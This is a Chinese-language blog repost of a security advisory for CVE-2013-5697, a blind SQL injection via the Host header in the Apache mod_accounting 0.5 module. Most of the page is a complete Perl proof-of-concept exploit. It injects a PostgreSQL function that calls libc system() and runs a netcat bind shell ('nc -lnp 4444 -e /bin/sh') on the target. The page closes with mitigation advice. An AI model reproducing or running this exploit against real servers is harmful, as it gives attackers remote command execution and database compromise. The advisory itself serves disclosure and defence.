Apache 'mod_accounting'模块SQL注入漏洞(CVE-2013-5697)

漏洞版本:

mod_accounting 0.5

漏洞描述:

BUGTRAQ  ID: 62677
CVE ID: CVE-2013-5697

mod_accounting是Apache 1.3.x上的流量计费模块,该模块使用数据记录流量,支持的数据库类型包括MySQL及PostgreSQL。

mod_accounting 0.5模块在Host报文头中存在SQL注入漏洞,攻击者可利用此漏洞破坏应用,执行未授权数据库操作。该漏洞源于用户提供的HTTP报文头未经过滤即用在查询内。该模块使用了简单的字符串串联来修改已定义查询内的占位符,然后再发送到数据库内。该代码位于mod_accounting.c内。
<* 参考
http://packetstormsecurity.com/files/123408/mod_accounting-0.5-Blind-SQL-Injection.html
http://sebug.net/appdir/Apache
*>

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. #!/usr/bin/perl
  2. # PoC of blind SQL injection in the mod_accounting/0.5 Apache module
  3. # Injection can occur via the Host header
  4. # As the injection occurs in a user defined insert statement a bit of trial
  5. and error is required
  6. # Database operations occurs asyncronous to page response so timing attacks
  7. wont work
  8. # This one is completely blind
  9. # DB can be mysql or postgres, this PoC only covers postgres
  10. # PoC executes netcat to listen on port 4444 (requires dba privileges)
  11. use IO::Socket::INET;
  12.  
  13. print"#----------------------------------------------#\n";
  14. print"| mod_accounting/0.5 PoC exploit by \ () Wireghoul |\n";
  15. print"| www.justanotherhacker.com |\n";
  16. print"#----------Command execution via SQLi----------#\n";
  17. print"[*] Enumerating blind injection vectors:\n";
  18.  
  19. my@endings=("'));",'"));',"));","');",'");',");","';",'";',";");
  20. # These should terminate most insert statements
  21. #my @endings = ( "');" );
  22. my $shell ='nc -lnp 4444 -e /bin/sh';
  23. my $cnt =0;
  24. my $content ="CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
  25. '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
  26. foreach $end (@endings){
  27. $cnt++;
  28. my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]")ordie"Unable to
  29. connect to $ARGV[0]:$ARGV[1]: $!\n";
  30. my $str ="GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
  31. \r\n\r\n";# from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
  32. \r\n\r\n";
  33. print "[-]Trying $end\n";
  34. print $sock $str;
  35. #print "Sent $end\n";
  36. close ($sock);
  37. }
  38. print "[*]Done, remote server should have executed $shell\n";

Sebug安全建议:

临时解决方法:

该模块已经不再提供支持,可以根据需要,停止使用该模块。

厂商补丁:

mod_accounting
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/mod-acct/files/
posted @ 2013-10-09 19:17  夏虫xm  阅读(414)  评论(0编辑  收藏  举报